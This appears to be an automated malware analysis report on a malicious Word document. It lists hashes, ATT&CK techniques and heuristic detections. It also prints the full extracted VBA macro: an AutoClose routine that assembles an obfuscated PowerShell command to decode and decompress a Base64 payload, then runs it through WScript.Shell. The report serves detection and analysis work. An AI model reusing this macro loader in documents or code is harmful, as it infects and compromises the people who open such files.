Office (OOXML) malware analysis — malicious · 8f94ac223f454ea3

MALICIOUS

Office (OOXML)

21.1 KB Created: 2021-06-03 13:34:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-13

MD5: 55118aaeb66b021c8fc6a0995c368977 SHA-1: 9374af1d26702b521d0b3ed9386f8796c2c5d11c SHA-256: 8f94ac223f454ea32bfec7f0682f3b66704e14db26babcd7f0af639de77b56e7

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains VBA macros that execute upon closing the document. These macros utilize WScript.Shell and CreateObject to decompress and execute a Base64 encoded payload, likely a second-stage downloader. The AutoClose macro is designed to trigger this malicious behavior automatically when the document is closed.

Heuristics 7

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()"
    Set asd = CreateObject("WScript.Shell")
    asd.Run (CG)

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()"
    Set asd = CreateObject("WScript.Shell")
    asd.Run (CG)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Attribute VB_Customizable = True
Sub AutoClose()
    gkYQTk
```
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5144 bytes
SHA-256: `74f955a3af1fa7dad09a179783b9c7b921c1f9adeaf053c9f4b8cd7deec5acd4`
Detection ClamAV: No threats found Obfuscation or payload: likely 99 of 157 identifiers look randomly generated (e.g. 'IFaMq1ARwGVoI5RqYyvMkKq1bCr7uVPVxj5QjrXm') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() gkYQTk End Sub Public Function gkYQTk() As Variant Dim CG As String CG = " inVokE-EXpRESSioN ( nEw-oBjECT SystEm.IO.cOmPREs" CG = CG + "sion.dEflATEStReaM([IO.MemoRYsTrEaM] [SYsTem.CoNvE" CG = CG + "Rt]::frOmbAse64STrING('jVfxU9tKDv5XdhjebXIEN0ChfeW" CG = CG + "4G8d2Er8mTrCdUi6TqY29CQZj5+wNJKX+30/Sbmjf3P3wZhji9" CG = CG + "a6kT9Inae0uW4wdvk7rL6IKIrcsotCMetHIaYxp8MXx62xSGOP" CG = CG + "4YeKz44FgZ+3Xw9eP0elpw64Ym1eivzDMOnDGvdGtMXDC8Hbtt" CG = CG + "FiL8WDHjxjjteTsiHHxBDqKeCWeBK4ZL6RhbmT5FMushIO8MGZ" CG = CG + "wkh3xLFdynLUZaxsHA0f2MyfK0wPACXoTPMV4nNxrTemgUg/lZ" CG = CG + "g0PfFrmWbILhCQ98J9nhZJZgVLW7nCPli0UKUhic5dn9A7UdwI" CG = CG + "ZExCZJRwhXDJXhYi8RvdPot9P0H39Ct3+Eo82onX4WkSzfNS0L" CG = CG + "90+idDJeYsHSZWtFaAeKEXjPC+Tx5ECVmrjq5WCylfg/eLN1By" CG = CG + "hBgmGqcoQ8Fr2MDxHLZ5TdEGT1jAqUccK/VyQmFPQifgO4pALw" CG = CG + "IFaMq1ARwGVoI5RqYyvMkKq1bCr7uVPVxj5QjrXmFrwh7E3j5Q" CG = CG + "7iOboDQoCARixStJdLhBBoNOIYelhJNziuUyQDAXIcRUCZMMbC" CG = CG + "NZtDl+fI3OkiGdNRrmwQiBnDfH3hO9ahu1aoTvxYn83D6Sfeat" CG = CG + "OsAukGBuT3h9wdrH49MlzXsBjyir49CUy88Yw0xQYyx2IUAFxU" CG = CG + "oGkWGVrxQQdbR0q5E2CEB/RRQqVhtnpgmJCiWptm9QWP2NPHOA" CG = CG + "9FSdkMkSAPMeQJLoUIPBvoUOFjF3+woMWH37G04j29ptCM5rAw" CG = CG + "jKJTPzb2LSGrue8dpugXMqXWFeHgBcq5lggewC0lYkaNsfEjKQ" CG = CG + "qaxCD9Q2tFSB9MNV0fVG/KDUtX6BvkCf3Is/RKoAhV5Hpx31I1" CG = CG + "TD2F7+fsvYb2/ac3ZOEjKhEX+kkN04eOK/zIPGzaUgMWUAvELL" CG = CG + "vimhkH2Bka8xBtipiuVEuVgK7hq7vFhT3dIM+YHEf6cbBsbyxs" CG = CG + "sFW2wiocGfQsKByZ9Fo1HRanng5ntw9iCRkbxzzgGPCcyrg2NC" CG = CG + "sh4Ej50FYZcVg0WZtoOVYhPcT246cZeR6rnSjidcwpGmLHcztP" CG = CG + "Hef1mUlW9HBo6gKkZ+dRgftxRq7TsIOmGqTgIqimDAIi9iq5gX" CG = CG + "HGcF2C6lzMJUVo80BFZKcVvt4muk+TZhyLupar1sudVhJopQp0" CG = CG + "jkuUwwcULPDdEKl6jHFSr04WFdl4sVPon35F91AfcoV5BcjHFt" CG = CG + "6qSyQQ/Dr6pasMcEBcofxvZsILhfDmJCnXNdkq5b7vlFg5XFUd" CG = CG + "pCv1em/iPSI13srpB7owHSNbCUOFV4VSjdauqPiLHOC/SWr5IZ" CG = CG + "wxkRjPq1KKRJqhC3MEZaX1i0pMVx5h0ONr038n+7TBHStO6R2R" CG = CG + "pZcGkZSJ5jvj73o3yD7TonCZ034rJBM7y5zIK6ub0p/SWAAm0o" CG = CG + "uzpgjvpGUEkq7Eqa4qja3VEgneaq8Ah7KNr27pB6Pfehz5FQeT" CG = CG + "OPoTF0AoHceh7u1YMdj8XQnKlsssyLDNg4lNXbC+zKyUyfqQ1l" CG = CG + "EYZRhXRxjmqB8P2NqEGN+hv9PyQZtBus4EThQbqg18DO9N43rO" CG = CG + "ryvNjiOzF5U27rIuPlEMOss4GqoQTMtepslhXWpiFVxbM3DyIy" CG = CG + "8NBdqiID+s1Pjs+YIjAdoMHviFXAKu0z8pGsDmgg30jxXsYABM" CG = CG + "neppBaHr71N1O87kQ8tv3KCQMH6v9ohslCnKaaeLgj3CAcvWx1" CG = CG + "YxHdRAD5hpOczUA5Ch69wJ/vuEFzW3Z6D1bedaeRPQseSyyiPB" CG = CG + "2ATZ+T2fffXI+UoSteRj9mMwn4emfoc6Lr8X3zE7jjXnMameLf" CG = CG + "pLwX4BUmMfCeoCSYg+rcCPK0mYSQsGfVHoLnD5r5YgtWJtgp7i" CG = CG + "ezn8arBkGHWetGsr6PT20kxXywgCnu43W3vY+fn4vxD55etbhd" CG = CG + "X2X714dfVxz/tWWeUnHpXS7h1VptCZk/CgF1RletaVM9ZImrjK" CG = CG + "a7q+zgHr5NyvWvtsXVYFx3rzaL+EqhuRqldCchoh13glYE1l/P" CG = CG + "gNgidseE5IcwP/9lNnGmZeXJsevHAqUChs506iTzpdq0J2PY2D" CG = CG + "t2gQOt5dHHRXHnOjRowkqEqwOiJ0LhxelbuOkXI6OimUcweQ/f" CG = CG + "h39UUzvP43bkB6y5sICUhgWn5UjMvZBfGySUOjpvJzcX7Sxaq3" CG = CG + "qPkUqHa/7sPBj4Alur5E+2cnKgGYHTb+14FDSB7VFd2NhDJY8n" CG = CG + "VVSmIRIWZO2zNQ2iThlNYpQ1XLPB3VmRJmQoYkRKuXW4xaOH1z" CG = CG + "Ht2/BB2+3751IsD5+J9EKpNvATEZq9rDq/JkJmYpsJxAR6Y1ke" CG = CG + "1MAnS6AUxm1vTfjTHK3Nj2o7prXTTQzH+Xh201C/j3rV5asJqf" CG = CG + "E3vzRfTdqHx8snK3O7l7GtUdgI7aJGu+fiHlQe+hs1Vi7/Ly5X" CG = CG + "6KODFO5yDWhbuGNBpKJLr+zXXxKbUGkMR23Abghulrdyc1dSE4" CG = CG + "dLNj82VgAHR7hy+zhptSElN/cnXWywKoFYtkVpCIh98cT1zAgk" CG = CG + "xhK5qbkbyRvSmfrm9vXyTrMqvO8PyndTxZGaOal3cyFGpOWpVw" CG = CG + "gZauebIipOho7TFs1zC5s3E/4z7wguzGKVBM15To3UUfoL2Atr" CG = CG + "3/eIXk9sdMeKxufppKRRfQ+BEApwokBNmYLkuXMwllnnd4nO//" CG = CG + "X4wO/pXc2I5t/n9xenj3z9929nD8MfkH8uPD//UAwb1+qpBwMe" CG = CG + "P3XS0Gej3VbSqGwxarfa7hnF6fo4i+on9YL+B0ANWDvVWeDqi8" CG = CG + "/PD12/NArOH6mj1G4yyxrAmGy9ctH87Pb9AzYE+2dFCfzT43bF" CG = CG + "X8UAb+zONAps27AdazRBlC3/BzAlTKqG902vs8w1T9kmVC4rZn" CG = CG + "81mP83ek1n9/v6n1QylUOBbc3y3nVT0urU/CDqPtIJho3xaNA2" CG = CG + "lVJPTiVPh1/BdQp87lvpyxP7ymAn6eoGJu6ML4B/4f19kyYsar" CG = CG + "l96dOvgVkg/vStLH9jt3mUzULO+2T7bZy/6KuX/Z2CV9cN1OSP" CG = CG + "xYnd9xdtthJOaUWiqJO6x2eVNkU/i1I6liR7V0HspYoevEgciS" CG = CG + "GXPjZJII1OazRyyfrbADRvUxepz3I7xcf7eMPZWjJHjDeRwgdk" CG = CG + "6fphkxdy6j32aO39jmm2kEhGhZTBDefrcqH7ww3W+/hc=' ) ," CG = CG + " [sYstEM.io.cOMpreSSIoN.cOMPrEssIoNmodE]::DECoMpRe" CG = CG + "Ss) \| fOReaCH-oBJECt{ nEw-oBjECT IO.sTREAMreaDer( " CG = CG + "$_, [teXt.encoDINg]::ascIi )} ).ReaDTOEND()" Set asd = CreateObject("WScript.Shell") asd.Run (CG) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	20480 bytes
SHA-256: `4620bc002441137806e56d8c81f59e497d26a5864d49547b9bb4c7c49030b6b7`
Detection ClamAV: No threats found Obfuscation or payload: likely 288 of 514 identifiers look randomly generated (e.g. 'sh4Ej50FYZcVg0WZtoOVYhPcT246cZeR6rnSjidc') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.